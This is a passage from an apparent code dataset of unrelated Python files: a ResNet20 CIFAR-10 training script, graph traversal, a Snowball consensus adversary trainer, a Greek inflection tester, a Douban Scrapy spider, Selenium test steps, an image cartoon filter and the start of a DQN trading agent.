transform=transform_test)\n\n num_train = len(trainset)\n indices = list(range(num_train))\n train_idx, valid_idx = indices[:45000], indices[45000:]\n val_dataset = Subset(valset, valid_idx)\n train_dataset = Subset(trainset, train_idx)\n\n trainloader = torch.utils.data.DataLoader(train_dataset, batch_size=train_batch_size, shuffle=True, **kwargs)\n valloader = torch.utils.data.DataLoader(val_dataset, batch_size=test_batch_size, shuffle=False, **kwargs)\n testloader = torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False, **kwargs)\n return trainloader, valloader, testloader\n\n\n@ex.capture\ndef get_data_train_test(train_batch_size, test_batch_size):\n kwargs = {'num_workers': 0, 'pin_memory': True} if torch.cuda.is_available() and not DEBUG_MODE else {} # tried 3 workers\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])\n\n trainset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=True, download=True, transform=transform_train)\n testset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=False, download=False, transform=transform_test)\n\n\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size, shuffle=True, **kwargs)\n testloader = torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False, **kwargs)\n\n\n return trainloader, testloader\n\n\n\n\n\n@ex.capture\ndef get_model(quantize_activations, quantize_weights, use_batchnorm, model, memory_weights_constraints_flag, lambda_memory_weights_loss, memory_weights_constraints):\n\n if model == \"resnet20\":\n net = resnet20(use_batchnorm=use_batchnorm,\n quantize_weights=quantize_weights, quantize_activations=quantize_activations,\n memory_weights_constraints_flag = memory_weights_constraints_flag,\n lambda_memory_weights_loss = lambda_memory_weights_loss,\n memory_weights_constraints = memory_weights_constraints)\n else:\n raise ValueError(\"Model {} not known\".format(model))\n\n return net\n\n\n@ex.config\ndef config():\n train_batch_size = 128\n test_batch_size = 128\n\n lr = 0.01\n epochs = 170 # 100\n log_interval = 100\n restore_path = None \n pretrain_path = None # use this if you want to init with pretrained FP model\n\n use_batchnorm = True\n\n quantize_activations = False\n quantize_weights = True\n\n\n act_fn = \"relu\"\n model = \"resnet20\" # \"resnet20\"\n schedule = \"resnet\" # learning rate scheduler\n\n memory_weights_constraints_flag = True\n lambda_memory_weights_loss = 0.001\n memory_weights_constraints = 70.\n\n\n\n\n\n@ex.capture\ndef get_loss_criterion():\n\n def loss_criterion(output, target):\n return F.cross_entropy(output, target), output\n\n return loss_criterion\n\n\n@ex.capture\ndef get_lr_scheduler(lr, schedule, optimizer):\n if schedule == \"plateau\":\n return ReduceLROnPlateau(optimizer, 'max', factor=0.9, patience=1, verbose=True, min_lr=0.001 * lr)\n\n elif schedule == \"resnet\":\n def _schedule(epoch):\n if epoch >= 80 and epoch < 120:\n mul = 0.1\n elif epoch >= 120:\n mul = 0.01\n else:\n mul = 1.0\n return mul\n return LambdaLR(optimizer, lr_lambda=_schedule)\n\n elif schedule == 'no':\n def _schedule(epoch):\n mul = 1.0\n return mul\n\n return LambdaLR(optimizer, lr_lambda=_schedule)\n\n else:\n raise NotImplementedError('ERROR LR scheduler')\n\n\n@ex.capture\ndef configure_starting_point(lr, quantize_weights, quantize_activations, restore_path, pretrain_path, model):\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n ####################################\n # pretrain path : init. a model with pretrained FP model\n # restore path : load model trained with mpdnn and load parameters of the optimizer as well\n\n ####################################\n\n\n if restore_path is not None:\n\n\n\n print(\"==> Resuming from Checkpoint...\")\n\n if torch.cuda.is_available():\n checkpoint = torch.load(restore_path)\n else:\n checkpoint = torch.load(restore_path, map_location='cpu')\n\n\n _model = {k[7:] if 'module.' in k else k: v for k, v in checkpoint[\"model\"].items() }\n\n\n\n #############################################\n\n try:\n model.load_state_dict(_model)\n except RuntimeError as e:\n\n model_dict = model.state_dict()\n\n # 1. filter out unnecessary keys\n pretrained_dict = {k: v for k, v in _model.items() if k in model_dict and 'scale_premultiplier' not in k}\n # 2. overwrite entries in the existing state dict\n model_dict.update(pretrained_dict)\n # 3. load the new state dict\n model.load_state_dict(model_dict)\n\n #############################################\n\n\n model = model.to(device)\n\n\n ###################################\n flag_restore = True\n if flag_restore:\n optimizer = torch.optim.SGD(model.parameters(), lr=checkpoint['optimizer']['param_groups'][0]['lr'], momentum = 0.9)\n optimizer.load_state_dict(checkpoint['optimizer'])\n else:\n optimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum = 0.9)\n optimizer.load_state_dict(checkpoint['optimizer'])\n ###################################\n\n\n epoch, best_val_acc, best_val_epoch = checkpoint[\"epoch\"], checkpoint[\"best_val_acc\"], checkpoint[\"best_epoch\"]\n start_epoch = epoch + 1\n\n\n else:\n initialized_activation_quantizers = False\n need_to_initialize_activations = True\n if pretrain_path is not None:\n # strict = True\n print(\"==> Loading Pretrained Network\")\n\n if torch.cuda.is_available():\n state = torch.load(pretrain_path)\n else:\n state = torch.load(pretrain_path, map_location='cpu')\n\n\n # _optimizer = state[\"optimizer\"]\n if pretrain_path.endswith(\".pt\"):\n _model = {k[7:] if 'module.' in k else k: v for k, v in state[\"model\"].items()}\n elif pretrain_path.endswith(\".th\"):\n _model = {k[7:] if 'module.' in k else k: v for k, v in state['state_dict'].items()}\n\n #############################################\n try:\n model.load_state_dict(_model)\n except RuntimeError as e:\n\n model_dict = model.state_dict()\n # 1. filter out unnecessary keys\n pretrained_dict = {k: v for k, v in _model.items() if\n k in model_dict and 'scale_premultiplier' not in k}\n # 2. overwrite entries in the existing state dict\n model_dict.update(pretrained_dict)\n # 3. load the new state dict\n model.load_state_dict(model_dict)\n #############################################\n model = model.to(device)\n print(\"==> Starting from pretrained Model\")\n\n # init weight and activ quant\n\n model = model.to(device)\n\n\n\n optimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum = 0.9)# , weight_decay = 0.0002) # weight decay for the baseline\n\n # optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n start_epoch = 0\n best_val_acc = -np.inf\n best_val_epoch = 0\n\n\n return model, optimizer, best_val_acc, start_epoch, best_val_epoch\n\n\n@ex.automain\ndef cifar10(epochs, log_interval, pretrain_path, restore_path, use_batchnorm, quantize_activations, quantize_weights, _seed, _run):\n\n print('get_local_dir', get_local_dir(\"data/cifar10\"))\n\n assert (pretrain_path is None) + (restore_path is None) > 0, \"Only pretrain_path or restore_path\"\n\n exp_dir = get_experiment_dir(ex.path, _run)\n\n print(\"Starting Experiment in {}\".format(exp_dir))\n with CaptureStdOut(log_file_path=os.path.join(exp_dir, \"output.txt\") if not False else os.path.join(exp_dir, \"val_output.txt\")):\n try:\n # Data\n train_loader, test_loader = get_data_train_test()\n\n\n # Model\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = get_model()\n\n # Configure\n\n model, optimizer, best_val_acc, start_epoch, best_val_epoch = configure_starting_point(model=model)\n model = model.to(device)\n\n # Misc\n train_writer = SummaryWriter(log_dir=exp_dir)\n hooks = TBHook(model, train_writer, start_epoch * len(train_loader), torch.cuda.device_count(), log_interval)\n\n\n scheduler = get_lr_scheduler(optimizer=optimizer)\n\n\n\n\n gc.collect()\n model = torch.nn.DataParallel(model)\n gc.collect()\n\n best_epoch = 0\n best_val_acc = -np.inf\n criterion = get_loss_criterion()\n\n\n\n\n if torch.cuda.is_available():\n _, test_acc = test(model, test_loader)\n print('Test acc before training ', test_acc)\n\n\n\n\n ##########################################################################################\n start_epoch = 0\n val_list = []\n for epoch in range(start_epoch, start_epoch + epochs + 1):\n\n ##########################################################################################\n\n print('EPOCH: ', epoch)\n\n ##########################################################################################\n print('Training')\n train_loss, train_acc = train_epoch(model=model, train_loader=train_loader, optimizer=optimizer, epoch=epoch, train_writer=train_writer,\n log_interval=log_interval, criterion=criterion)\n ##########################################################################################\n\n\n\n train_loss_eval, train_acc_eval = test(model, train_loader)\n train_writer.add_scalar(\"Validation/TrainLoss\", train_loss_eval, epoch * len(train_loader))\n train_writer.add_scalar(\"Validation/TrainAccuracy\", train_acc_eval, epoch * len(train_loader))\n print(\"Epoch {}, Training Eval Loss: {:.4f}, Training Eval Acc: {:.4f}\".format(epoch, train_loss_eval, train_acc_eval))\n\n\n val_loss, val_acc = test(model, test_loader)\n\n ##########################################################################################\n\n\n try:\n scheduler.step(epoch = epoch)\n except TypeError:\n scheduler.step()\n\n ##########################################################################################\n\n train_writer.add_scalar(\"Validation/Loss\", val_loss, epoch * len(train_loader))\n train_writer.add_scalar(\"Validation/Accuracy\", val_acc, epoch * len(train_loader))\n train_writer.add_scalar(\"Others/LearningRate\", optimizer.param_groups[0][\"lr\"], epoch * len(train_loader))\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n best_epoch = epoch\n save_state(model=model.state_dict(), optimizer=optimizer.state_dict(), epoch=epoch, best_val_acc=best_val_acc, best_epoch=best_epoch,\n save_path=os.path.join(exp_dir, \"best_model.pt\"))\n print(\"Epoch {}, Validation Loss: {:.4f},\\033[1m Validation Acc: {:.4f}\\033[0m , Best Val Acc: {:.4f} at EP {}\".format(epoch, val_loss,\n val_acc,\n best_val_acc,\n best_epoch))\n\n # saving the last model\n save_state(model=model.state_dict(), optimizer=optimizer.state_dict(), epoch=epoch, best_val_acc=best_val_acc, best_epoch=best_epoch,\n save_path=os.path.join(exp_dir, \"model.pt\"))\n\n\n # save all models, print real bops\n folder_to_save = 'mpdnn_models'\n if not os.path.exists(folder_to_save):\n os.makedirs(folder_to_save)\n\n\n name_to_save = 'model_'+str(epoch)+'.pt'\n print('Epoch: ', epoch)\n print('Val ACC ', val_acc)\n if epoch % 5 == 0:\n print('Plot weights')\n plot_weights(model, epoch)\n print('Saving a model ')\n save_state(model=model.state_dict(), optimizer=optimizer.state_dict(), epoch=epoch,\n best_val_acc=best_val_acc, best_epoch=best_epoch,\n save_path=folder_to_save+'/'+name_to_save)\n\n\n\n\n \n print(\"Early Stopping Epoch {} with Val Acc {:.4f} \".format(best_epoch, best_val_acc))\n\n except Exception:\n write_error_trace(exp_dir)\n raise\n","repo_name":"vovamedentsiy/mpdnn","sub_path":"resnet20_cifar10.py","file_name":"resnet20_cifar10.py","file_ext":"py","file_size_in_byte":16173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9114934468","text":"\nimport sys\nfrom collections import deque\n\ndef dfs(x):\n checked[x]=1\n print(x, end=\" \")\n for i in graph[x]:\n if (checked[i]==0):\n dfs(i)\n\ndef bfs(x):\n queue=deque()\n checked[x]=1\n queue.append(x)\n \n while queue:\n y=queue.popleft()\n print(y, end=\" \")\n for i in graph[y]:\n if(checked[i]==0):\n checked[i]=1\n queue.append(i)\n\n\nn, m, v = map(int, sys.stdin.readline().split())\ngraph = [[] for _ in range(n+1)]\nchecked = [0] * (n + 1)\n\n# 인접 리스트 만들기\nfor _ in range(m):\n a, b = map(int, sys.stdin.readline().split())\n graph[a].append(b)\n graph[b].append(a)\n\n# 정렬\nfor i in range(1, n+1):\n graph[i].sort()\n\ndfs(v)\n# 체크 배열 초기화\nchecked = [0] * (n + 1)\nprint()\nbfs(v)","repo_name":"aeong98/algorithm","sub_path":"백준/그래프/DFS와 BFS.py","file_name":"DFS와 BFS.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9892317616","text":"import multiprocessing\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nimport torch.nn.functional as F\nimport torch.optim\nimport torch.utils.data\n\nfrom learning.model import load_net, save_net, capture_state, path\nfrom protocol import SnowballProtocol\n\nVERBOSE = True\nDISCOUNT = .99\n\n\ndef get_samples(proto, take_percent=.01):\n state, sender, action, value = [], [], [], []\n\n proto.reset()\n done = False\n\n if VERBOSE:\n print(\"Start simulation\")\n print(proto.snowball_map)\n\n while not done:\n # Save only 1% of the sample to avoid bias\n save = random.uniform(0, 1) < take_percent\n\n if save:\n s = capture_state(proto)\n\n done = proto.step()\n\n if save:\n info = proto.history[-1]\n\n if info['votes'] is not None:\n f = s[info['from']]\n\n part_id, votes = info['q_participants'], info['votes']\n\n for pid, v in zip(part_id, votes):\n if proto.participant_objects[pid].adversary:\n state.append(s)\n sender.append(f)\n action.append(v)\n value.append(proto.iteration)\n\n if VERBOSE and proto.iteration % 10000 == 0:\n print(proto.iteration)\n\n last_it = proto.iteration\n for i in range(len(value)):\n n = last_it - value[i] + 1\n value[i] = (1 - DISCOUNT ** n) / (1 - DISCOUNT)\n\n return state, sender, action, np.array(value, dtype=np.float32)\n\n\ndef train(args):\n states, sender, action, value = [], [], [], []\n with open(os.path.join(path('dataset'), f'supervised-{args.adversary_strategy}.pkl'), 'rb') as f:\n num_sim = 0\n while True:\n try:\n states_x, sender_x, action_x, value_x = pickle.load(f)\n num_sim += 1\n states.extend(states_x)\n sender.extend(sender_x)\n action.extend(action_x)\n value.extend(value_x)\n except EOFError:\n print(\"Number of simulations loaded:\", num_sim)\n print(\"Dataset entries:\", len(states))\n break\n\n states = torch.Tensor(states)\n dataset = torch.utils.data.DataLoader(list(zip(states, sender, action, value)), batch_size=32, shuffle=True)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(\"Device:\", device)\n\n net = load_net(f'supervised-{args.adversary_strategy}')\n net.to(device)\n\n optim = torch.optim.Adam(net.parameters())\n\n for epoch in range(args.num_epochs):\n for s, f, a, v in dataset:\n s = s.to(device)\n f = f.to(device)\n vp, ap = net(s, f)\n\n # value_loss = F.mse_loss(vp, v.unsqueeze(1))\n a = a.to(device)\n action_loss = F.cross_entropy(ap, a)\n\n # loss = action_loss + value_loss\n\n optim.zero_grad()\n action_loss.backward()\n optim.step()\n\n print(\"Action loss:\", action_loss.cpu().data.numpy())\n # print(loss, value_loss, action_loss)\n\n save_net(net, f'supervised-{args.adversary_strategy}')\n\n\ndef create_dataset(args):\n def build(tasks, lock, count):\n for _ in iter(tasks.get, '<>'):\n args.record = True\n proto = SnowballProtocol(args)\n\n states, sender, action, value = get_samples(proto)\n\n lock.acquire()\n\n if not os.path.exists(path('dataset')):\n os.mkdir(path('dataset'))\n\n count.value += 1\n\n print(\"Saving simulation: \", count.value)\n with open(os.path.join(path('dataset'), f'supervised-{args.adversary_strategy}.pkl'), 'ab') as f:\n pickle.dump((states, sender, action, value), f)\n\n lock.release()\n\n num_process = multiprocessing.cpu_count()\n print(\"Number of cores:\", num_process)\n tasks = multiprocessing.Queue()\n [tasks.put(None) for _ in range(20)]\n [tasks.put('<>') for _ in range(num_process)]\n\n lock = multiprocessing.Lock()\n count = multiprocessing.Value('i', 0)\n\n for i in range(num_process):\n multiprocessing.Process(target=build, args=(tasks, lock, count)).start()\n","repo_name":"SkidanovAlex/snowball","sub_path":"snowball/learning/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"38733034314","text":"import yaml\n\nfrom accent import strip_length\n\nfrom greek_inflexion import GreekInflexion\n\n\ndef output_detail(detail):\n print(\" -\")\n\n if \"stem\" in detail:\n print(\" stem: {}\".format(detail[\"stem\"]))\n\n if \"stemming\" in detail:\n print(\" stemming:\")\n print(\" base: {}\".format(detail[\"stemming\"][\"base\"]))\n print(\" ending: {}\".format(\n detail[\"stemming\"][\"ending\"]))\n print(\" rule: \\\"{0.a}|{0.b}>{0.c}<{0.d}|{0.e}\\\"\".format(\n detail[\"stemming\"][\"rule\"]))\n print(\" used_default: {}\".format(\n detail[\"stemming\"][\"used_default\"]))\n\n if \"original_form\" in detail:\n print(\" original_form: {}\".format(detail[\"original_form\"]))\n if \"accent_notes\" in detail:\n print(\" accent_notes: {}\".format(detail[\"accent_notes\"]))\n\n if \"override\" in detail:\n print(\" override: {}\".format(detail[\"override\"]))\n\n\ndef output_item(\n lemma, segmented_lemma, key, part, form, line, stem,\n possible_stems, likely_stems, possible_parses, generated, correct):\n print()\n print(\"-\")\n print(\" form: {}\".format(form))\n print(\" correct: \\\"{}/{} {}\\\"\".format(\n len(generated), form.count(\"/\") + 1, correct))\n print(\" generated:\")\n for generated_form in generated.keys():\n print(f\" - {generated_form}\")\n print()\n print(\" lemma: {}\".format(lemma))\n if segmented_lemma:\n print(\" segmented_lemma: {}\".format(segmented_lemma))\n print(\" key: {}\".format(key))\n print(\" part: {}\".format(part))\n if line:\n print(\" line: {}\".format(line))\n print()\n\n if stem:\n if len(stem) == 1:\n print(\" stem: {}\".format(list(stem)[0]))\n else:\n print(\" stem: {}\".format(list(stem)))\n\n if likely_stems:\n print(\" likely_stems:\")\n for likely_stem in sorted(likely_stems):\n print(\" {}: {}\".format(*likely_stem))\n\n if possible_stems:\n print(\" possible_stems:\")\n for possible_stem in sorted(possible_stems):\n print(\" - {} {} # {}\".format(*possible_stem))\n\n if possible_parses:\n print(\" possible_parses:\")\n for guess in sorted(possible_parses):\n print(\" - {}\".format(guess))\n\n if generated:\n print(\" generated:\")\n\n for generated_form, details in generated.items():\n print(\" -\")\n print(\" form: {}\".format(generated_form))\n print(\" details:\")\n for detail in details:\n output_detail(detail)\n\n\ndef test_generate(\n stemming_file, lexicon_file, test_file,\n global_tags=None, debug=False\n):\n \"\"\"\n generates all the forms in the test_file using the lexicon_file and\n stemming_file and outputs any discrepancies (or everything if debug on)\n \"\"\"\n\n ginflexion = GreekInflexion(stemming_file, lexicon_file)\n\n with open(test_file) as f:\n for test in yaml.safe_load(f):\n source = test.pop(\"source\", None)\n test.pop(\"test_length\", False)\n lemma = test.pop(\"lemma\")\n tags = set(test.pop(\"tags\", []))\n if source:\n tags.update({source})\n if global_tags:\n tags.update(global_tags)\n\n segmented_lemma = ginflexion.segmented_lemmas.get(lemma)\n for key, form in sorted(test.items()):\n stem = ginflexion.find_stems(lemma, key, tags)\n generated = ginflexion.generate(lemma, key, tags)\n\n if stem:\n stem_guess = None\n else:\n stem_guess = [\n stem for key, stem in\n ginflexion.possible_stems(form, \"^\" + key + \"$\")]\n\n if [strip_length(w) for w in sorted(generated)] == \\\n [strip_length(w) for w in sorted(form.split(\"/\"))]:\n correct = \"✓\"\n else:\n correct = \"✕\"\n if debug or correct == \"✕\":\n output_item(\n lemma, segmented_lemma, key, None, form, None, stem,\n stem_guess, None, None, generated, correct)\n","repo_name":"jtauber/greek-inflexion","sub_path":"test_generate.py","file_name":"test_generate.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"53"} +{"seq_id":"30939386022","text":"#\n# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Request\nimport json\nimport re\n# from pprint import pprint\n\n\nclass MoviesSpider(scrapy.Spider):\n BASE_URL = 'https://movie.douban.com/j/search_subjects?type=movie&tag=%s&sort=recommend&page_limit=%s&page_start=%s'\n MOVIE_TAG = '豆瓣高分'\n PAGE_LIMIT = 20\n page_start = 0\n\n name = 'movies'\n start_urls = [BASE_URL % (MOVIE_TAG, PAGE_LIMIT, page_start)]\n\n def parse(self, response):\n # 使用 json 模块解析响应结果\n infos = json.loads(response.body.decode('utf-8'))\n\n # 迭代影片信息列表\n for movie_info in infos['subjects']:\n movie_item = {}\n\n # 提取“片名”和“评分”,填入 item\n\n # 提取影片页面 url,构造 Request 发送请求,并将 item 通过 meta 参数传递给影片页面解析函数\n yield Request(movie_info['url'], callback=self.parse_movie, meta={'_movie_item': movie_item})\n\n # 如果 json 结果中包含的影片数量小于请求数量,说明没有影片了,否则继续搜索\n if len(infos['subjects']) == self.PAGE_LIMIT:\n self.page_start += self.PAGE_LIMIT\n url = self.BASE_URL % (self.MOVIE_TAG, self.PAGE_LIMIT, self.page_start)\n yield Request(url)\n\n def parse_movie(self, response):\n # 从 meta 中提取已包含“片名”和“评分”信息的 item\n movie_item = response.meta['_movie_item']\n\n # 获取整个信息字符串\n info = response.css('div#info').xpath('string(.)').extract_first()\n\n # 提取所有字段名\n fields = [s.strip().replace(':', '') for s in response.css('div#info span.pl::text').extract()]\n\n # 提取所有字段的值\n values = [re.sub('\\s+', '', s.strip()) for s in re.split('\\s*(?:%s):\\s*' % '|'.join(fields), info)][1:]\n\n # 将所有信息填入 item\n movie_item.update(dict(zip(fields, values)))\n\n yield movie_item","repo_name":"Rockyzsu/ScrapyBook","sub_path":"douban_movie/douban_movie/spiders/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"zh","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"26097127844","text":"from pages.AgendaPage import AgendaPage\nfrom behave import *\nimport time\n\n\n@when(u'Filtrar por nombre agenda, organismo y servicio \"{Agenda}\" \"{organismo}\" \"{Servicio}\"')\ndef step_impl(context, Agenda, organismo, Servicio):\n try:\n AgendaPage.FiltrarXComponenetesAgenda(context, Agenda, organismo, Servicio)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Filtrar por nombre agenda, organismo y servicio\"\n\n\n@when(u'Click en Configurar Registro Agenda')\ndef step_impl(context):\n try:\n AgendaPage.ConfiguracionAgenda(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Click en Configurar Registro Agenda\"\n\n\n@when(u'Seleccionar Dias de agenda')\ndef step_impl(context):\n try:\n AgendaPage.SeleccionarDias(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Seleccionar Dias de agenda\"\n\n\n@when(u'Ingresar Duracion turno y confirmacion \"{duracionTurno}\"')\ndef step_impl(context, duracionTurno):\n try:\n AgendaPage.IngresarYConfirmarDuracionTurno(context, duracionTurno)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Ingresar Duracion turno y confirmacion\"\n\n\n@when(u'Ingresar Fechas vigencia desde y hasta')\ndef step_impl(context):\n try:\n AgendaPage.FechasDesdeYHasta(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Ingresar Fechas vigencia desde y hasta\"\n\n\n@when(u'Agregar franja horaria')\ndef step_impl(context):\n try:\n AgendaPage.AgregarFranjaHoraria(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Agregar franja horaria\"\n\n\n@when(u'Ingresar horario 1er turno y ultimo turno \"{primerTurno}\" \"{ultimoTurno}\"')\ndef step_impl(context, primerTurno, ultimoTurno):\n try:\n AgendaPage.IngresarPrimerYUltimoTurno(context, primerTurno, ultimoTurno)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Ingresar horario 1er turno y ultimo turno\"\n\n\n@when(u'Ingresar cantidad de turnos en simultaneo \"{turnosSimultaneos}\"')\ndef step_impl(context, turnosSimultaneos):\n try:\n AgendaPage.TurnosSimultaneos(context, turnosSimultaneos)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Ingresar cantidad de turnos en simultaneo\"\n\n\n@when(u'Click en Aceptar y Guardar configuracion de agenda')\ndef step_impl(context):\n try:\n AgendaPage.AceptarYGuardar(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Validar Alta correcta de configuracion Agenda\"\n\n\n@then(u'Validar Alta correcta de configuracion Agenda')\ndef step_impl(context):\n try:\n AgendaPage.ValidateToastAltaConfiguracionAGENDA(context)\n time.sleep(2)\n context.driver.close()\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Validar Alta correcta de configuracion Agenda\"\n\n\n\n","repo_name":"MarcosIannello/AutomationBDD_Python_selenium","sub_path":"TestAutomation/features/steps/ConfiguracionAgenda.py","file_name":"ConfiguracionAgenda.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1119565869","text":"import threading\nfrom ghostprotocol import nrf24l01,portChecker\nfrom time import sleep\n\n# Port Selection\nport = portChecker()\nnodeId = input(\"nodeId >> \")\n\n# Creating the nrf24l01 object\nnrf = nrf24l01(port,nodeId,237415,\"AX45-S\") # Creating object nrf24l01\nnrf.moduleInit()\nprint(nrf.cardSpec) # See the properties of the object\n\n# Setting transmitter side\ndef transmitter():\n while True:\n dataToTX = input()\n if dataToTX[:10] == \"/send_file\":\n fileName = dataToTX.split(\" \",1)[1]\n s,f,t = nrf.fileTX(fileName).values()\n #print(f\"Total Success : {nrf.totalCorrectTransmissions} | Total Failed {nrf.totalIncorrectTransmissions} | Success : {s} | Failed {f} | Time Elapsed : {t}\")\n else :\n s,f,t = nrf.msgTX(dataToTX).values()\n #print(f\"Total Success : {nrf.totalCorrectTransmissions} | Total Failed {nrf.totalIncorrectTransmissions} | Success : {s} | Failed {f} | Time Elapsed : {t}\")\n\n# Setting receiver side1\ndef receiver():\n while True:\n msg = nrf.rx()\n if msg != None:\n try:\n node, data = msg[\"node\"], msg[\"data\"]\n print(f\"{node} >> {data}\")\n except: pass\n sleep(0.01)\n\nt1 = threading.Thread(target=transmitter)\nt2 = threading.Thread(target=receiver)\n\nt1.start()\nt2.start()","repo_name":"x3beche/GhostProtocol","sub_path":"sourceCode/v2 - current version/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16357716467","text":"import cv2 \r\nimport numpy as np\r\n#imports the edge detector from previous part as well as the median filter files\r\nfrom EdgeCartoon import Edge_Dectection_func\r\nfrom MedianCartoon import filterset\r\nif __name__ == '__main__': \r\n #Reads input image\r\n input_image = cv2.imread('mandrill.png',1)\r\n output_image = input_image .copy()\r\n\r\n\r\ndef CartoonFilter(in_img):\r\n new_img = np.copy(in_img)\r\n #sends the input image through the edge detector imported from the previous part to get highlighted edges\r\n edge_img = Edge_Dectection_func(new_img)\r\n #Sends the input image through the series of median filters imported from previous part\r\n median_img = filterset(new_img)\r\n #loops through the entire range of the image\r\n for i in range(in_img.shape[0]):\r\n for j in range(in_img.shape[1]):\r\n #If the loop encounters 0 intensity (non edges), the median filtered image is used\r\n if edge_img[i,j][0] ==0 and edge_img[i,j][1]==0 and edge_img[i,j][2]==0 :\r\n new_img[i,j] = median_img[i,j] \r\n #Else, the intensity is made black or 0 intensity\r\n else:\r\n new_img[i,j] = 0\r\n #returns the cartoonie image \r\n return new_img\r\nif __name__ == '__main__': \r\n #Calls upon CartoonFilter function\r\n output_image = CartoonFilter(input_image)\r\n cv2.imshow('Cartoonie',output_image)\r\n cv2.imwrite('Snowy_cartoon.jpg',output_image)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n","repo_name":"dvrbic/Cartoon-Effect-Filter","sub_path":"CartoonCombined/CartoonCombined/CartoonCombined.py","file_name":"CartoonCombined.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70044253289","text":"from RecordCandle import ReadCandles\nfrom Lob import ReadLobs\nfrom Env import QRLEnv\nfrom Model import DQN\n\nimport torch\nimport gym\nimport os\nimport ptan\n\nimport torch.nn as nn\nimport torch.optim as optim\nimport sys\nimport time\nimport numpy as np\n\nDEFAULT_EVENT_COUNT = 100\nDEFAULT_TRADE_COUNT = 10\nDEFAULT_CANDLE_COUNT = 10\nDEFAULT_LOB_NUM_LEVEL = 10\nDEFAULT_EVENT_WIDTH = 7\nDEFAULT_TRADE_WIDTH = 5\nDEFAULT_CANDLE_WIDTH = 4\nDEFAULT_AP_WIDTH = 5\nDEFAULT_SUPRES_WIDTH = 6\nDEFAULT_ACTION_N = 5\n\nBATCH_SIZE = 32\nBARS_COUNT = 500\nTARGET_NET_SYNC = 1000\n\nGAMMA = 0.99\n\nREPLAY_SIZE = 100000\nREPLAY_INITIAL = 10000\n\nREWARD_STEPS = 1\n\nLEARNING_RATE = 0.0001\n\nSTATES_TO_EVALUATE = 1000\nEVAL_EVERY_STEP = 1000\n\nEPSILON_START = 1.0\nEPSILON_STOP = 0.1\nEPSILON_STEPS = 1000000\n\nCHECKPOINT_EVERY_STEP = 100000\nVALIDATION_EVERY_STEP = 100000\n\n\nclass RewardTracker:\n def __init__(self, stop_reward, group_rewards=1):\n self.stop_reward = stop_reward\n self.reward_buf = []\n self.steps_buf = []\n self.group_rewards = group_rewards\n\n def __enter__(self):\n self.ts = time.time()\n self.ts_frame = 0\n self.total_rewards = []\n self.total_steps = []\n return self\n\n def __exit__(self, *args):\n pass\n\n def reward(self, reward_steps, frame, epsilon=None):\n reward, steps = reward_steps\n self.reward_buf.append(reward)\n self.steps_buf.append(steps)\n if len(self.reward_buf) < self.group_rewards:\n return False\n reward = np.mean(self.reward_buf)\n steps = np.mean(self.steps_buf)\n self.reward_buf.clear()\n self.steps_buf.clear()\n self.total_rewards.append(reward)\n self.total_steps.append(steps)\n speed = (frame - self.ts_frame) / (time.time() - self.ts)\n self.ts_frame = frame\n self.ts = time.time()\n mean_reward = np.mean(self.total_rewards[-100:])\n mean_steps = np.mean(self.total_steps[-100:])\n epsilon_str = \"\" if epsilon is None else \", eps %.2f\" % epsilon\n print(\"%d: done %d games, mean reward %.3f, mean steps %.2f, speed %.2f f/s%s\" % (\n frame, len(self.total_rewards)*self.group_rewards, mean_reward, mean_steps, speed, epsilon_str\n ))\n sys.stdout.flush()\n\n if mean_reward > self.stop_reward:\n print(\"Solved in %d frames!\" % frame)\n return True\n return False\n\n\ndef calc_values_of_states(states, net, device=\"cpu\"):\n mean_vals = []\n for batch in np.array_split(states, 64):\n states_v 